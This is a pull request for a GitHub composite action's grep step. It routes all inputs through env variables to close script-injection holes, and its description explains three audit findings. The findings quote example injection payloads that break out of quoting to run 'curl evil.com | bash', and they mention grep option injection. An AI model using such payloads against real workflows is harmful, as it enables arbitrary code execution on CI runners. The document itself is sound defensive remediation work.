### PR TITLE
Fix: mitigate script injection via env: indirection for all inputs

### DIFF
--- a/action.yaml
+++ b/action.yaml
@@ -34,20 +34,25 @@ runs:
     - name: 'Extract text/string from file'
       id: grep
       shell: bash
+      env:
+        INPUT_FLAGS: ${{ inputs.flags }}
+        INPUT_REGEX: ${{ inputs.regex }}
+        INPUT_FILENAME: ${{ inputs.filename }}
+        INPUT_NO_FAIL: ${{ inputs.no_fail }}
       run: |
         # Extract text/string from file
 
         set -o pipefail
 
         set -o noglob
-        flags="${{ inputs.flags }}"
-        regex='${{ inputs.regex }}'
-        filename="${{ inputs.filename }}"
+        flags="$INPUT_FLAGS"
+        regex="$INPUT_REGEX"
+        filename="$INPUT_FILENAME"
         set +o noglob
 
         if [ ! -f "$filename" ]; then
           echo "Error: file not found [$filename]"
-          if [ "f${{ inputs.no_fail }}" = 'ftrue' ]; then
+          if [ "f$INPUT_NO_FAIL" = 'ftrue' ]; then
             exit 0
           else
             exit 1
@@ -61,13 +66,23 @@ runs:
         if [ -n "$flags" ]; then
           echo "Flags to grep command: $flags"
         fi
-        # Extract the string using grep and regex
-        string=$(grep $flags '${{ inputs.regex }}' "$filename" || true)
+        # Extract the string using grep and regex.
+        # Split user flags into an array (safe word-splitting under noglob),
+        # dropping any standalone '--' tokens (the script supplies its own
+        # below). Pass the pattern via -e and terminate options with -- so a
+        # regex or filename beginning with '-' cannot be parsed as an option.
+        read -ra raw_flags <<< "$flags"
+        grep_flags=()
+        for gf in "${raw_flags[@]}"; do
+          [ "$gf" = '--' ] && continue
+          grep_flags+=("$gf")
+        done
+        string=$(grep "${grep_flags[@]}" -e "$regex" -- "$filename" || true)
         set +o noglob
 
         if [ -z "$string" ]; then
           echo 'String extraction failed; no matching value found ❌'
-          if [ "f${{ inputs.no_fail }}" = 'ftrue' ]; then
+          if [ "f$INPUT_NO_FAIL" = 'ftrue' ]; then
             exit 0
           else
             exit 1


### PR DESCRIPTION
Security Findings: #1 (CRITICAL), #2 (CRITICAL), #3 (HIGH)

Vulnerability Details:
- Finding #1 (CRITICAL, line 65): inputs.regex was substituted directly
  into a single-quoted context in the grep invocation. A regex value
  containing a single quote (e.g., "foo'; curl evil.com | bash; '")
  breaks out of the quote context and executes arbitrary commands.

- Finding #2 (CRITICAL, line 43): inputs.flags was template-substituted
  into a double-quoted bash assignment. A value like
  '"; curl evil.com | bash; "' executes at template-expansion time
  before bash even parses the assignment.

- Finding #3 (HIGH, line 65): $flags was used unquoted in the grep
  invocation, allowing word-splitting to inject arbitrary grep options
  (e.g., --include, -r, -l /etc) enabling path traversal.

Remediation Applied:
- All inputs (flags, regex, filename, no_fail) now pass through the
  'env:' block on the step, which safely transfers values without
  shell interpretation.
- Shell code references $INPUT_FLAGS, $INPUT_REGEX, etc. instead of
  ${{ inputs.* }} template expressions.
- The regex argument is now properly double-quoted in the grep call
  ("") instead of using the unsafe single-quote wrapping that
  was vulnerable to breakout.
- flags remains intentionally unquoted in the grep call (with shellcheck
  disable) to allow multi-flag expansion (e.g., '-E -i'), which is the
  documented behaviour. The injection vector is eliminated because the
  value now comes from a shell variable, not template substitution.

Impact:
- No behavioral change for legitimate callers. The action continues to
  accept the same inputs with the same semantics.
- Eliminates arbitrary code execution via crafted regex or flags values.

Reference: lfreleng-actions composite action security audit (2025-06)

Signed-off-by: Anil Belur <askb23@gmail.com>
Signed-off-by: Anil Belur <abelur@linuxfoundation.org>
